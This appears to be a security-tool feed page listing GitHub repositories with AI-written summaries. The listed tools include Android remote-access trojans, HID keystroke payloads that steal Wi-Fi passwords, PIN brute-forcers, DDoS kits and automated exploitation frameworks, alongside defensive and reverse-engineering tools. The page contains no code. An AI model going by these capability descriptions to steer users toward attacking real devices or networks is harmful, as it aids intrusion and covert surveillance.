HackyFeed

.github

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pretendo Network is a repository designed to support community collaboration by providing essential files and templates for contributors. Its primary use case includes establishing guidelines for licensing, security, and conduct within the community. Notable features include a structured contribution guide and established policies to ensure a cooperative and secure environment for development.

README

Pretendo Network

This special repository contains community files and common templates.

.NET-Deobfuscator

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: .NET Deobfuscator is a comprehensive resource cataloging various open-source tools designed for the deobfuscation and unpacking of .NET applications. It serves as a centralized reference for developers needing to reverse-engineer obfuscated or packed .NET assemblies, featuring tools for numerous specific obfuscation methods such as Agile, Babel, and BoxedAppPacker among others. Notable features include linked resources for each tool, allowing for easier navigation and access to functionalities tailored for specific obfuscators.

.NET-Obfuscator

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: .NET Obfuscator is a protection tool designed for .NET applications, aimed at preventing reverse engineering by transforming the original code into a format that is difficult to decipher. Its notable features include the ability to obscure intellectual property, enhance security against vulnerabilities, and reduce code size for improved application performance.

README

.NET-Obfuscator

.NET Obfuscator is a tool that is used to protect .NET applications from reverse engineering.

This is done by transforming the original .NET code into a form that is difficult to understand, making it hard for attackers to decompile the code and understand how it works.

31-days-of-API-Security-Tips

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “31-days-of-API-Security-Tips” repository provides a comprehensive set of daily tips aimed at enhancing the security posture of APIs through practical advice and insights. It is primarily designed for penetration testers and developers to identify and mitigate common API vulnerabilities such as BOLA (IDOR), command injection, and mass assignment. Notable features include a structured format for presenting security tips, real-world exploitation techniques, and guidance on testing different API authentication mechanisms.

A-Red-Teamer-diaries

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: A-Red-Teamer-diaries is a collaborative repository containing publicly accessible notes and resources for penetration testing and red teaming activities, focusing on various tools and techniques employed during security assessments. Key features include a cheatsheet for quick command reference, detailed methodologies for effective exploitation, and practical scripts for network scanning and enumeration, enhancing both learning and efficiency in cybersecurity engagements. This tool serves as a practical guide for professionals aiming to improve their pentesting methodologies in controlled environments.

AboutSecurity

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AboutSecurity is a comprehensive security assessment tool that provides a variety of dictionaries and payloads tailored for penetration testing tasks. Its features include an extensive set of predefined dictionaries for different attack vectors, a range of skills related to reconnaissance, exploitation, and post-exploitation, as well as external tool integration for scanning and fuzzing, complemented by reference documentation for effective team collaboration.

README

AboutSecurity

Dic
- Auth : 认证字典
  - 账号和密码。
- Network : 网络
  - 排除的私有 IP 段、本地 IP 段、dns 服务器列表。
- Port : 端口字典
  - 按照端口渗透的想法,将不同端口承载的服务可爆破点作为字典内容。
- Regular : 规则字典
  - 各种规则、排列的字典整理。
- Web : Web 字典
  - web 渗透过程中出现的可爆破点作为字典内容。
Payload
- Burp
- CORS
- email
- Format
- HPP
- LFI
- OOB
- SQL-Inj
- SSI
- XSS
- XXE
Skills — AI Agent 技能方法论 (55 skills)
- recon (5) : 侦察类 — 资产侦察、被动信息收集、子域名深挖、目标画像、社会工程
- exploit (26) : 漏洞利用类 — SQL 注入、XSS、SSTI、文件上传、反序列化、JWT、GraphQL、SSRF/XXE、CORS、CSRF、OAuth、WebSocket、竞态条件、缓存投毒/请求走私等
- ctf (5) : CTF 竞赛类 — Web 解题方法论、CTF 侦察、源码审计、Flag 搜索、Flag 校验
- postexploit (6) : 后渗透类 — Linux/Windows 后渗透、提权检查、凭据喷射、横向移动、持久化
- lateral (3) : 内网渗透类 — AD 域攻击、内网侦察、多层网络穿透
- cloud (2) : 云环境类 — 云元数据利用、IAM 权限审计与提权
- evasion (4) : 免杀对抗类 — C2 框架免杀、Shellcode Loader 生成、免杀技术整合、安全研究
- general (4) : 综合类 — 红队评估、移动后端 API、报告生成、供应链审计
- 📊 Skill Benchmark: python scripts/bench-skill.py --all — A/B 测试 Skill 对 Agent 的实际效果
Tools — 外部工具声明式 YAML 配置
- scan : 扫描工具 (nmap, masscan)
- fuzz : Fuzz 工具 (dirsearch)
Doc
- Checklist : 渗透测试过程中的检查项,杜绝少测、漏测的情况。
- Cheatsheet : 渗透测试信息收集表,渗透测试时直接复制一副作为参考、信息记录、方便团队协作、出报告等。
- 出报告专用 : 记录部分平常渗透测试遇到的案例。
- 行业名词

参考

Above

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Above is a network security sniffer designed for penetration testers and security engineers to identify vulnerabilities in network equipment through traffic analysis. It operates silently, leveraging the Scapy library, and supports the detection of up to 28 protocols, including ARP, EAPOL, and various SCADA protocols. Users can operate it in ‘hot’ mode for real-time sniffing or ‘cold’ mode for analyzing pre-captured traffic dumps, with features like passive ARP detection and VLAN segment search.

Active-Directory-Exploitation-Cheat-Sheet

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Active Directory Exploitation Cheat Sheet serves as a comprehensive resource for cybersecurity professionals, detailing methodologies and commands for navigating the Active Directory environment. Its primary use case involves facilitating reconnaissance, privilege escalation, and lateral movement within a network through structured commands using Powershell and .Net. Notable features include a systematic approach to various stages of the exploitation process, including domain enumeration, persistence techniques, and monitoring account vulnerabilities.

Active-Directory-Exploitation-Cheat-Sheet

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Active Directory Exploitation Cheat Sheet serves as a comprehensive resource for security professionals, detailing various enumeration and attack techniques within Windows Active Directory environments. It encompasses methods for domain enumeration, local privilege escalation, lateral movement, and domain persistence, while providing actionable insights and references to essential tools such as PowerView, Mimikatz, and BloodHound. This tool is particularly notable for its structured approach to various exploitation vectors, facilitating an efficient and systematic exploitation process.

ADB-Toolkit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ADB-Toolkit is a comprehensive toolkit designed for testing and auditing Android Debug Bridge (ADB) configurations and vulnerabilities. Its primary use case lies in enhancing the security of Android devices by providing features such as device enumeration, file management, and installation of applications via ADB commands. Notable features include a user-friendly interface and extensive enhancements for common tasks associated with ADB, making it suitable for both developers and security researchers.

adbwebkit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ADB WebKit is a browser-based tool designed for managing Android devices via ADB (Android Debug Bridge) with an intuitive user interface. Its primary use case includes functionalities like application management (installing, uninstalling, granting permissions), shell access, screen capture, and device control commands, making it a comprehensive solution for developers and testers. Notable features include support for live application management, real-time screen interactions, and various device control options, all accessible through a USB connection or IP address.

AdminHack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AdminHack is a script designed to identify admin login pages and assess potential EAR vulnerabilities across web applications by utilizing multi-threading and an extensive wordlist. It supports various web technologies, including PHP, ASP, and HTML, and includes features such as web crawling, custom path support, and results exportation to files. This tool is particularly useful for penetration testing and security assessments of web environments.

README

• License • Issues • Developer • Wikipedia •

afrog

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Afrog is a security tool designed for bug bounty programs, penetration testing, and red teaming efforts. It facilitates the creation and execution of Proofs of Concept (PoCs) to help security professionals identify vulnerabilities in systems. Notable features include a streamlined PoC writing guide, multi-language support, and a community-driven approach to contribute new exploit techniques.

README

A Security Tool for Bug Bounty, Pentest and Red Teaming

English • 中文

agentic-radar

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Agentic Radar is a security scanner specifically designed for analyzing agentic workflows, enabling users to identify vulnerabilities within their processes. Key features include Agentic Prompt Hardening, testing for vulnerabilities, and integration with CI/CD workflows, ensuring that security is maintained throughout the development lifecycle.

README

A Security Scanner for your agentic workflows!

AggressorScripts

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Aggressor Scripts is a collection of scripts designed to enhance the functionality of Cobalt Strike, primarily aiding penetration testers and red teamers in executing various tasks more efficiently. Notable features include payload generation for different delivery methods, querying for installed antivirus solutions, and tools for detecting endpoint detection and response (EDR) solutions, all aimed at improving user experience and operational effectiveness during security assessments. Additionally, the repository serves as a resource for common OS commands and red teaming strategies, promoting collaborative improvement through community feedback.

ai-website-cloner-template

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The AI Website Cloner Template is a sophisticated tool designed to reverse-engineer any website into a modern Next.js codebase using AI coding agents. By pointing the tool at a target URL, it performs a comprehensive analysis to extract design tokens and assets, generate component specifications, and facilitate parallelized reconstruction of the site’s sections. Key features include support for multiple AI agents, a detailed multi-phase cloning pipeline, and compatibility with modern web technologies like Next.js and Tailwind CSS.

aleph

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Aleph is an open-source tool designed for indexing and searching large volumes of documents and structured data, primarily aimed at facilitating investigative reporting. Its notable features include the ability to cross-reference entities against various watchlists, enhancing the efficiency of data analysis for reporters and organizations engaged in investigative work. As of December 2025, the project is transitioning to a new platform, Aleph Pro, while transitioning support for the current version will continue until that date.

ALHacking

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ALHacking is a versatile ethical hacking toolkit designed for conducting various cybersecurity activities, including social media and phone attacks, user discovery, and webcam hacks. Notably, it features a powerful DDoS attack tool and is compatible with Android (via Termux), Linux, and Unix operating systems. Users can easily install the toolkit by cloning the repository and running the installation script from the terminal.

README

Author: 4lbH4cker

Version 4

(

AllHackingTools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AllHackingTools is a penetration testing toolkit designed for Termux that automates the installation and management of various hacking tools. Its primary use case is to facilitate the setup and customization of a hacking environment on Termux, allowing users to quickly download and run tools directly from the interface. Notable features include an updated installer with enhanced design elements, streamlined updating capabilities, and improved system stability.

README

• License • Issues • Project • Wikipedia •

AlliN

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ALLiN is a versatile penetration testing tool designed for lateral movement assessments within intranets, capable of handling a wide variety of target formats such as links and CIDR notations. Notable features include support for both Python 2.7 and 3.x, passive identification of web frameworks and components, extensive fingerprint data, and the ability to work across platforms when compiled with pyinstaller. It efficiently organizes scan results and offers multiple configuration options for targeting, threading, and reporting, making it a comprehensive solution for security professionals.

alternative-frontends

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Alternative Frontends is a curated collection of privacy-respecting web applications designed as alternatives to mainstream social media services. It features a variety of lightweight, ad-free frontends that are open-source and self-hostable, catering to users looking for enhanced privacy without sacrificing functionality. Notable offerings include dedicated clients for platforms like YouTube and Reddit, each prioritizing user privacy and offering decentralized hosting options.

README

Alternative Frontends

This is a list of privacy-respecting frontends to popular services like social media. All of them are cross-plattform webapps and should work on your device no matter the OS and hardware.

ambiguous-png-packer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ambiguous PNG Packer is a tool designed to create PNG files that display differently when viewed in Apple software versus non-Apple software. Its primary use case is to demonstrate the manipulation of image rendering based on the viewer’s platform, showcasing unique features such as the ability to produce different images through refreshes, highlighting potential vulnerabilities in Apple’s image handling mechanisms.

README

Ambiguous PNG Packer

Craft PNG files that appear completely different in Apple software

Android-Exploits

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Android-Exploits is a repository that consolidates various Android exploits and provides a comprehensive guide for conducting Android exploitation. Its primary use case is to facilitate the testing and assessment of Android application security vulnerabilities through categorized exploits such as Denial of Service, local, remote, and web application exploits. Notable features include detailed instructions for utilizing the exploits alongside third-party tools like ExploitPack, along with references to common mobile hacking tools and resources related to Android security risks.

Android-PIN-Bruteforce

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Android-PIN-Bruteforce is a tool that allows users to unlock Android devices by executing a brute-force attack on the lockscreen PIN. Utilizing a rooted Kali Nethunter phone connected via USB OTG, it emulates keyboard input to automatically input and retry PIN combinations, supporting lengths from 1 to 10 digits and providing features such as configurable delays, optimized PIN lists, and the ability to bypass phone pop-ups. The tool does not require the locked device to be rooted and works across various Android versions.

Android-Security-Exploits-YouTube-Curriculum

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Android Security & Reverse Engineering YouTube Curriculum is a comprehensive educational resource focused on various aspects of Android security, including exploits, reverse engineering, and vulnerabilities in mobile applications. It features a curated collection of talks and demonstrations from prominent security conferences, addressing topics like heap exploitation, mobile permissions, and countermeasures against mobile threats. Notably, it educates on advanced concepts such as Bluetooth security, malware analysis, and attack vectors affecting the Android ecosystem, making it essential for cybersecurity practitioners and researchers.

android-unpacker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Android Unpacker tool facilitates the reverse engineering and unpacking of Android applications protected by various obfuscation techniques, including APKProtect and Bangcle. Its notable features include a native unpacker that operates without dependencies on GDB, scripts for unpacking specific protections, and methods for hiding debugging environments from detection. This tool is primarily intended for educational and research purposes in the field of malware analysis.

README

android-unpacker

Android Unpacker presented at Defcon 22: Android Hacker Protection Level 0

android-unpinner

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Android Unpinner is a tool designed to facilitate the removal of SSL certificate pinning from Android APKs without requiring root access. Utilizing the Frida framework, it modifies only the AndroidManifest.xml file to enable debugging, while dynamically injecting a Frida Gadget via ADB to perform the unpinning process. The tool is equipped with comprehensive dependencies for cross-platform use and supports handling XAPKs by extracting and installing split APKs effectively.

Androl4b

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Androl4b is an Android security virtual machine based on Ubuntu Mate, designed for reverse engineering and malware analysis, incorporating a comprehensive suite of tools and resources. It features updated frameworks, hands-on labs, and various security assessment tools like Radare2, Frida, and MobSF, facilitating both static and dynamic analysis of Android applications. The environment is tailored for security researchers and developers to enhance their understanding and skills in Android security.

Andromeda

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Andromeda is a performance-oriented tool designed for accelerating the initial reverse engineering of Android applications, leveraging its C/C++ implementation. It aims to simplify the analysis process with a straightforward command-line interface, making it accessible for security researchers and developers. Currently in early development, Andromeda highlights the potential for speed improvements over alternative solutions in the same domain.

README

Andromeda makes initial reverse engineering work of Android applications bit faster and easier. Compared to other alternatives, it’s written in C/C++ and has a noticeable performance advantage.

AndroRAT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AndroRAT is a remote access tool for Android devices that allows users to control and retrieve information from the device. Its primary use case includes monitoring and managing Android systems covertly, featuring capabilities such as persistent backdoor access, audio and video recording, and obtaining device location and SIM details. Notably, AndroRAT consists of a client/server architecture implemented in Java for Android and Python for the server side, enabling it to run on a wide range of Android versions from 4.1 to 9.0, with additional functionalities on Android 10.

AndroRAT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AndroRAT is a Remote Administration Tool designed for Android devices, enabling the remote control and data retrieval from the Android system. Key functionalities include accessing contacts, call logs, messages, GPS location, and multimedia capabilities like capturing photos and streaming audio and video. The tool operates as a background service triggered by SMS or calls, providing a comprehensive suite for remote monitoring and management.

README

AndroRAT

Remote Administration Tool for Android

AngryOxide

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AngryOxide is a Rust-based 802.11 attack tool designed for penetration testing and WiFi exploitation research. It provides an active state-based attack engine that retrieves EAPOL messages from access points and clients, with features such as target filtering, auto-hunting capability, and GPS integration for geo-fencing. The tool is equipped with a terminal UI, headless operation mode, and a variety of automated attacks aimed at retrieving cryptographic data for later cracking with tools like Hashcat.

Anthropic-Cybersecurity-Skills

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Anthropic Cybersecurity Skills is an extensive open-source repository that provides AI agents access to 753 structured cybersecurity skills across 26 domains, offering capabilities such as memory forensics and Kubernetes RBAC auditing. The skills adhere to the agentskills.io standard, featuring a YAML structure for quick discovery and are fully mapped to MITRE ATT&CK and aligned with NIST CSF 2.0, enabling AI agents to perform advanced security tasks with enhanced contextual knowledge. This tool simplifies installation and empowers various platforms like Claude Code and GitHub Copilot to integrate these capabilities efficiently.

anti-emulator

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The anti-emulator tool is designed to detect emulated Android environments, leveraging various detection techniques inspired by both malware behavior and innovative methodologies. It serves primarily for educational and research purposes in the context of malware analysis and reversing, offering a collection of detection mechanisms while promoting responsible use. The project includes both source code and supportive materials, such as presentation slides from its initial unveiling.

README

anti-emulator

Android Anti-Emulator, originally presented at HitCon 2013: “Dex Education 201: Anti-Emulation”

AntiCheat-Testing-Framework

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The AntiCheat-Testing-Framework is a comprehensive tool designed for testing and analyzing various anti-cheat mechanisms in the gaming industry. It provides a modular architecture with several integrated modules, allowing users to customize their setup for specific testing purposes. This framework aims to democratize knowledge in the field of anti-cheat research, facilitating both learning and practical application.

README

AntiCheat-Testing-Framework

Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. The entry level to reverse AntiCheats and Cheats is quite high, therefore, I’m realeasing all the code I developed during my research. The main idea is to help people and motive them to get into this topic which is really interesting and there is a lot to research about it.

AntiDBG

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AntiDBG is a tool designed for implementing various anti-debugging techniques on Windows, categorized by methods such as memory, CPU, timing, and forced exceptions. The primary use case is to create self-contained checks that automatically detach debuggers, enhancing the security of applications against reverse engineering. Notable features include a simple API for integration, a testing application named The Gauntlet to evaluate resistance against these techniques, and an emphasis on readability for educational purposes.

antivmdetection

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Antivmdetection is a utility script designed to obscure virtual machine (VM) detection techniques by modifying settings within VirtualBox without altering its base. Its primary use case is for enhancing the anonymity of VMs by generating a shell template for host-side modifications and a Windows PowerShell script for guest-side adjustments, addressing various malware fingerprinting methods. Notable features include the ability to automate the configuration process while maintaining compatibility across VirtualBox updates and generating necessary scripts for both host and VM installations.

API-SecurityEmpire

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: API Security Empire is a comprehensive resource designed for enhancing API security and conducting penetration testing, featuring mindmaps, tips, and tools based on OWASP TOP 10 API guidelines. It covers information gathering, advanced recon techniques, and detailed methodologies for attacking RESTful, SOAP, and GraphQL APIs. Notable features include updated mindmaps in various formats, a curated list of essential tools, and practical exercises to test penetration skills.

README

🛡️ API Security Empire

Project Credits: Momen Eldawakhly (Cyber Guy)

In this repository you will find: Mindmaps, tips & tricks, resources and every thing related to API Security and API Penetration Testing. Our mindmaps and resources are based on OWASP TOP 10 API, our expereince in Penetration testing and other resources to deliver the most advanced and accurate API security and penetration testing resource in the WEB!!

🚪 First gate: `{{Recon}}`

The first gate to enter the API Security Empire is to know how to gather information about the API infrastructure and how to perform a powerfull recon on API to extract the hidden doors which made you compromise the whole infrastructure from, so, we provide this updated API Recon mindmap with the latest tools and methodologies in API recon:

APISecurityBestPractices

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GitGuardian offers a proactive solution for developers to detect and mitigate the exposure of sensitive API secrets, database credentials, and certificates in real-time within their GitHub repositories. Notable features include immediate alerts upon detecting potential leaks before the git process completes, along with comprehensive resources for best development practices and leak mitigation strategies.

README

GitGuardian Documentation and Resources

This repository provides resources for developers to keep their secrets secret.

apk.sh

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: apk.sh is a Bash script designed to streamline the reverse engineering of Android applications by automating tasks such as pulling, decoding, rebuilding, and patching APK files. It incorporates apktool for disassembling and reassembling resources, supports direct bytecode manipulation to prevent decompilation errors, and facilitates the integration of the frida-gadget for dynamic analysis without requiring a rooted device. Notable features include support for app bundles, multi-architecture compatibility, and code signing.

APKHunt

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: APKHunt is a static code analysis tool specifically designed for Android applications, leveraging the OWASP MASVS framework to identify and rectify security vulnerabilities. It offers comprehensive scanning capabilities, including support for multiple APK files, a low false-positive rate, and optimized rules for accurate vulnerability detection, making it suitable for both mobile developers and security testers. Notably, it produces results in a user-friendly TXT format and is tailored for Linux environments.

APKiD

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: APKiD is a tool designed to analyze Android APK files by identifying various compilers, packers, and obfuscators used in their creation, functioning similarly to PEiD for Windows applications. It supports configurable scanning options, outputs results in JSON format, and facilitates contributions for recognizing additional packaging methods. The tool is primarily used for Android security analysis, aiding in the detection of pirated or malicious applications.

README

APKiD

apkleaks

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: APKLeaks is an automated tool for scanning Android APK files to identify potentially sensitive information such as URIs, endpoints, and secrets. It integrates with the JADX disassembler for decompilation and offers customizable pattern matching through user-defined JSON files, alongside various output options, including text and JSON formats. Key features include support for disassembler arguments, making it flexible for advanced usage scenarios in security assessments of mobile applications.

README

APKLeaks

apkstudio

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: APK Studio is an open-source, cross-platform Integrated Development Environment (IDE) designed for reverse-engineering Android application packages (APKs). Its notable features include a built-in code editor with syntax highlighting for smali and other file types, automatic installation of essential tools, and support for manufacturer-specific frameworks, making it a comprehensive tool for decompiling, recompiling, and signing APKs. Additionally, APK Studio supports command-line operations, theming, and provides quick search functionalities across projects, enhancing the user experience for developers and analysts.

apkurlgrep

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ApkUrlGrep is a tool designed for extracting endpoints from APK files. Its primary use case is to facilitate the analysis of mobile applications by identifying URLs and their paths embedded within the app. Notable features include the ability to output both the discovered URLs and their corresponding paths, making it a valuable resource for security researchers and penetration testers.

README

ApkUrlGrep

Tool that allow extract endpoints from APK files

apple-knowledge

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “hack-different/apple-knowledge” repository hosts a compilation of reverse-engineered Apple data formats and protocols, primarily serving as a resource for jailbreak developers and hobbyists. Notable features include the availability of YAML files for machine-readable data, a collection of binary analysis and modification tools, and a Homebrew tap for easy installation of jailbreak-related utilities. The project emphasizes adherence to copyright laws while encouraging community contributions.

README

Apple Data Formats and Knowledge

A collection of reverse engineered Apple formats, protocols, or other interesting bits.

AppleNeuralHash2ONNX

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AppleNeuralHash2ONNX is a tool that converts Apple’s NeuralHash model, used for CSAM detection, into the ONNX format, allowing for greater integration and use in various deep learning frameworks. Notable features include the ability to tolerate image resizing and compression, and a comprehensive conversion process that includes decoding model components stored in LZFSE format. The repository also provides a demo script for testing the converted model’s functionality.

README

AppleNeuralHash2ONNX

Convert Apple NeuralHash model for CSAM Detection to ONNX.

ApplicationInspector

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Microsoft Application Inspector is a source code characterization tool that identifies the features of software components by analyzing code against over 400 rules and regex patterns. Its primary use case lies in aiding users to understand the behavior of both open-source and proprietary codebases, particularly in security contexts, without making determinations of “good” or “bad” practices. It supports multiple programming languages and can generate outputs in various formats, enhancing transparency in software analysis.

appmon

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AppMon is an automated framework designed for monitoring and tampering system API calls in native macOS, iOS, and Android applications, leveraging the capabilities of Frida. Its primary use case includes intercepting API calls to analyze app behavior and manipulating these calls to alter the original application functionalities. Notable features encompass an API sniffer, an intruder for data manipulation, an Android tracer for analyzing APKs, and tools for creating inspectable IPAs and APKs on non-jailbroken and non-rooted devices respectively.

AppVerifier

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AppVerifier is a tool designed for verifying the authenticity of mobile applications by comparing their package names and signing certificate hashes against provided or internally stored information. Its primary use case is to ensure users can confirm the genuineness of apps and share verification results with others efficiently. Notable features include a user-friendly interface for sharing and receiving verification information and compatibility with the Accrescent app store for enhanced security during downloads.

APT_REPORT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: APT_REPORT is a comprehensive collection of threat intelligence, samples, and reports on advanced persistent threat (APT) groups, particularly those linked to specific countries. It focuses on detailed analyses of various APT campaigns, enabling users to understand tactics and recent developments in cyber threat landscapes. Notable features include references to extensive case studies and operational details of prominent threat actor groups, enhancing situational awareness for cybersecurity professionals.

README

APT_REPORT collected by @blackorbird https://x.com/blackorbird

Interesting apt report & sample & malware & technology & intellegence collection

APTRS

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: APTRS (Automated Penetration Testing Reporting System) is a Python and Django-based tool that automates the generation of penetration testing reports in PDF and Excel formats, enhancing efficiency for security professionals. Its primary use case is to facilitate organized and streamlined reporting while allowing users to manage and monitor vulnerabilities across various projects. Notable features include support for multiple platforms, a user-friendly web interface, and integration with various CI/CD workflows for continuous testing.

archerysec

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ArcherySec is an open-source vulnerability assessment and management tool designed to integrate with CI/CD pipelines, allowing for automated security testing based on scan results. It utilizes popular open-source scanning tools to perform comprehensive web and network vulnerability assessments, while also providing features for vulnerability prioritization, management, and collaboration of scan data. Key functionalities include integration with REST APIs for developers, authenticated web scanning, and support for various third-party tools like OpenVAS and OWASP ZAP.

Argus

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Argus is a Python-based toolkit designed for information gathering and reconnaissance, enabling security analysts to assess networks, web applications, and security environments effectively. It integrates a user-friendly interface with numerous reliable modules, facilitating the efficient execution of reconnaissance tasks. Notably, it offers various installation options including direct execution, pip installation, and Docker support, ensuring ease of use across different environments.

README

A Python-based toolkit for Information Gathering & Reconnaissance

Artemis

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Artemis is a modular vulnerability scanner designed for assessing website security, primarily used by CERT PL for scanning activities. Its notable features include the ability to automatically generate user-friendly reports detailing specific vulnerabilities, such as exposed version control system data and outdated software versions, which aids organizations in mitigating security risks.

README

Artemis is a modular vulnerability scanner. It’s the tool that powers CERT PL scanning activities by checking various aspects of website security and building easy-to-read messages ready to be sent to the scanned organizations.

AsmResolver

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AsmResolver is a library designed for reading, modifying, and reconstructing Portable Executable (PE) files, with support for both unmanaged and managed (.NET) binaries. Its primary use case includes comprehensive manipulation of PE file structures, such as modifying sections and metadata, reconstructing Import Address Tables, and providing easy access to .NET metadata through a user-friendly API. Notable features include cross-platform compatibility, robust handling of obfuscated binaries, and support for a wide range of resource types and debugging symbols, all while being fully documented and unit tested.

asn

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The ASN Lookup Tool and Traceroute Server is a command line utility designed for network analysis, facilitating OSINT investigations through various capabilities including ASN lookup, RPKI validity checks, and geolocation of IP addresses. Key features include JSON output for API integration, support for querying multiple simultaneous targets, and integration with Shodan for reconnaissance without direct interaction with the target systems. This tool is particularly useful in incident response scenarios, providing comprehensive network data insights while maintaining stealth.

asnmap

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: asnmap is a Go CLI and library designed for quickly mapping organizational network ranges by leveraging Autonomous System Number (ASN) information. Its primary use case is for cybersecurity analysts to perform lookups for CIDR ranges based on various inputs such as ASN, organization name, domain, or IP addresses, with flexibility in output formats including JSON, CSV, and plain text. Notable features include support for multiple input types, integration with a Project Discovery Cloud Platform API for enhanced data retrieval, and the ability to operate with standard input/output.

athena

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Athena OS is a penetration testing operating system designed for InfoSec professionals, bug bounty hunters, and cybersecurity enthusiasts. It features automated package updates through GitHub Actions, maintains a collection of security tools, and offers Docker container support, enhancing accessibility and usability for various security assessments. Notably, it provides a user-friendly experience for both seasoned professionals and newcomers in the field of cybersecurity.

README

Dive into a new Pentesting Experience with
Athena OS

AttackSurfaceAnalyzer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Attack Surface Analyzer is an open-source security tool developed by Microsoft that evaluates the attack surface of a system by identifying security vulnerabilities arising from software installations or misconfigurations. Its core functionality includes the ability to compare and analyze system configurations before and after software is installed, monitoring multiple operating system components such as the file system, user accounts, and firewall settings. Version 2.3 introduces a Blazor GUI for rule authoring, enhanced performance, and support for .NET 6, along with various collectors for in-depth analysis.

AttackSurfaceMapper

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AttackSurfaceMapper is a reconnaissance tool designed to enhance the attack surface mapping of specified domains, subdomains, and IP addresses through a combination of open-source intelligence and active techniques. It automates the discovery of additional targets using methods such as bruteforcing, passive lookups, and network scanning, while also conducting passive reconnaissance activities like website screenshot capture, visual mapping, and credential checking against public breach databases. Notable features include customizable output formats, optional API integrations for enhanced data collection, and various reconnaissance modes including a stealthy passive option.

Attiny85

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The DigiSpark Attiny85 repository provides a cost-effective alternative to Rubber Ducky, enabling users to program the Attiny85 to function as a Human Interface Device (HID) that sends keystrokes to a computer. It includes various pre-built payloads such as a Wi-Fi password stealer, UAC bypass, and keylogger, allowing for a range of offensive actions from data exfiltration to system exploitation. Users can easily set up their development environment and execute these payloads using the Arduino IDE.

AutoPentestX

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AutoPentestX is an automated penetration testing toolkit designed for streamlined security assessments. Its primary use case is to facilitate vulnerability scanning and testing in Linux environments, offering features that simplify the process of identifying and exploiting security weaknesses. The toolkit supports Python 3.8 and above, underscoring its compatibility with modern scripting standards and enhancing its applicability in cybersecurity workflows.

README

AutoPentestX - Automated Penetration Testing Toolkit

AutoPWN-Suite

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AutoPWN Suite is a comprehensive tool designed for automatic vulnerability scanning and exploitation of systems, leveraging advanced scanning techniques such as nmap TCP-SYN scans to identify software versions and associated vulnerabilities. Key features include automatic vulnerability detection, web application testing for various exploits (LFI, XSS, SQLI), configurable scanning options, noise and evasion modes, along with easy result sharing via webhooks or email, and compatibility across multiple operating systems.

AutoSploit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AutoSploit is a tool designed to automate the exploitation of remote hosts by leveraging data from services like Shodan, Censys, and Zoomeye for target acquisition. It facilitates the execution of Metasploit modules aimed at achieving Remote Code Execution and establishing reverse connections or Meterpreter sessions. Notable features include the ability to specify custom targets, set proxy configurations, and manage operational security through options like using a VPS for operation.

Awesome-Android-Reverse-Engineering

Mon, 30 Mar 2026 00:00:00 +0000

